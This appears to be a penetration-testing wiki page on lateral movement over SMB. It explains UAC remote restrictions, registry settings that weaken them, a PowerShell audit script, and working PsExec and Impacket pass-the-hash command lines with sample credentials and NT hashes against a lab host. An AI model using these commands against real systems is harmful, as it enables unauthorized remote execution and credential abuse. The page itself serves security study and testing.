SMB protocol

This page deals with lateral movement using the SMB protocol.

Introduction

Lateral movement consists of techniques that enable an attacker to access and control remote systems. The SMB protocol is a well-known candidate for this purpose: it carries the ADMIN$ share, the service control manager and the other RPC interfaces that PsExec-style tools rely on.

Requirements

Definitions

There are 5 types of users:

  • Local users

    • With admin privileges on the machine

      • RID500

      • Non-RID500

    • Without admin privileges on the machine

  • Domain users

    • With admin privileges on machines

    • Without admin privileges on machines

RID 500 is the built-in local administrator account (the one whose SID ends in relative identifier 500), intended for installation and recovery purposes and usually named Administrator, even if it has been renamed.

UAC remote restrictions

Judging from the Microsoft and harmj0y references listed at the end of this page, we can say the following:

  • Local admin privileges on the target are required to WmiExec or PsExec (PsExec needs write access to ADMIN$ and the service control manager, WmiExec needs DCOM/WMI access, and both are reserved to administrators).

  • Non-RID 500 local admin accounts cannot WmiExec or PsExec on Windows Vista and later: UAC remote restrictions give network logons of such accounts a filtered (non-admin) token, so they authenticate successfully but are then denied access.

  • Domain users with admin privileges on the machine can: UAC remote restrictions only apply to local accounts.

  • The RID 500 local admin account can, because it is exempt from token filtering by default (see FilterAdministratorToken below).

Account type                                 | PsExec, WmiExec, SmbExec, AtExec, etc. (default UAC remote restrictions)
---------------------------------------------|--------------------------------------------------------------------------
Local users (no admin privileges)            | No
Local admins (non-RID 500)                   | No
Local admin RID 500                          | Yes
Domain users without local admin privileges  | No
Domain users with local admin privileges     | Yes

To allow non-RID 500 local admin accounts to perform WmiExec or PsExec (that is, to disable UAC remote restrictions; this needs an elevated prompt on the target), execute:

  • reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1

To prevent the RID 500 account from being able to WmiExec or PsExec (this enables Admin Approval Mode for the built-in Administrator, so its network logons get a filtered token too, as long as LocalAccountTokenFilterPolicy is not set to 1), execute:

  • reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1

Setting either value back to 0 (or deleting it) restores the default behaviour.
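As a quick check on the target before relying on the table above, the following PowerShell script (added here as an example; it is not part of the original page or of any tool it lists) reads the two registry values, enumerates the members of the local Administrators group and predicts, with the rules above, whether each member would receive a full admin token on a network logon. It assumes Windows 10 / Server 2016 or later (which ship the Microsoft.PowerShell.LocalAccounts module) and an elevated prompt; the host and its output are illustrative.

```powershell
# Added example (not from the original page): audit UAC remote restrictions on
# this host and predict, per local Administrators member, whether PsExec/WmiExec/
# SmbExec/AtExec from the network would get a full (unfiltered) admin token.
# Assumes an elevated PowerShell on Windows 10 / Server 2016 or later.

$key   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue

# An absent value behaves like 0: remote restrictions are on and the built-in
# Administrator (RID 500) is exempt from token filtering.
$tokenFilterPolicy = if ($null -ne $props.LocalAccountTokenFilterPolicy) { [int]$props.LocalAccountTokenFilterPolicy } else { 0 }
$filterAdminToken  = if ($null -ne $props.FilterAdministratorToken)      { [int]$props.FilterAdministratorToken }      else { 0 }

Write-Output "LocalAccountTokenFilterPolicy = $tokenFilterPolicy (1 = remote restrictions disabled for all local admins)"
Write-Output "FilterAdministratorToken      = $filterAdminToken (1 = RID 500 is filtered as well)"

# Resolve the Administrators group by its well-known SID so that a renamed or
# localised group name does not matter.
$adminGroup = Get-LocalGroup -SID 'S-1-5-32-544'

Get-LocalGroupMember -Group $adminGroup | ForEach-Object {
    # The last sub-authority of the SID is the RID (500 = built-in Administrator).
    $rid = [int]$_.SID.Value.Split('-')[-1]

    if ($_.PrincipalSource -eq 'ActiveDirectory') {
        # Domain principals are never subject to UAC remote restrictions.
        $remoteAdmin = 'Yes'
    }
    elseif ($tokenFilterPolicy -eq 1) {
        # LocalAccountTokenFilterPolicy = 1 lifts the restriction for every local admin.
        $remoteAdmin = 'Yes'
    }
    elseif ($rid -eq 500 -and $filterAdminToken -eq 0) {
        # The built-in Administrator is exempt unless FilterAdministratorToken = 1.
        $remoteAdmin = 'Yes'
    }
    else {
        $remoteAdmin = 'No (filtered token)'
    }

    [pscustomobject]@{
        Name        = $_.Name
        Source      = $_.PrincipalSource
        RID         = $rid
        RemoteAdmin = $remoteAdmin
    }
} | Format-Table -AutoSize
```

Run it locally, or through a session that already holds admin rights on the host; with only a non-RID 500 local admin over SMB it cannot be run remotely, for exactly the reason the table describes. If it reports "No" for the account you hold, the first reg add above lifts the restriction, but that itself requires an elevated local session (or a domain account with local admin rights) and is a change a defender can audit. Nested domain groups are listed as a single member with Source = ActiveDirectory; the script does not expand them.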

Tools

PsExec

On Windows, use Sysinternals PsExec (-s runs the command as SYSTEM on the target):

PsExec64.exe \\WIN01 -accepteula -s -u localadmin -p L0c4l4dm1n "cmd"

Sysinternals PsExec only accepts a cleartext password with -p; it cannot pass an NT hash. To use a hash from Windows, first start a process that authenticates with that hash (for example with Mimikatz sekurlsa::pth) and run PsExec from it without -u/-p, so that it uses the current logon session.

On Kali, use Impacket's psexec.py. It uploads a service binary to ADMIN$ and starts it through the service control manager, which is noisy. The "." domain means a local account; -hashes takes LMHASH:NTHASH, and aad3b435b51404eeaad3b435b51404ee is the empty LM hash:

psexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "cmd"
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "cmd"

WmiExec

On Kali, use Impacket's wmiexec.py (runs the command over DCOM/WMI and reads its output back from the ADMIN$ share, so no service is installed):

wmiexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig"
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig"

AtExec

On Kali, use Impacket's atexec.py (runs the command through the Task Scheduler service and reads its output from the ADMIN$ share):

atexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig"
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig"

SmbExec

On Kali, use Impacket's smbexec.py (creates a temporary service for each command; without a command argument it gives a semi-interactive shell):

smbexec.py ./localadmin:L0c4l4dm1n@192.168.10.60
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60

References

  • Microsoft, "Description of User Account Control and remote restrictions in Windows Vista" (KB 951016)

  • harmj0y, "Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy"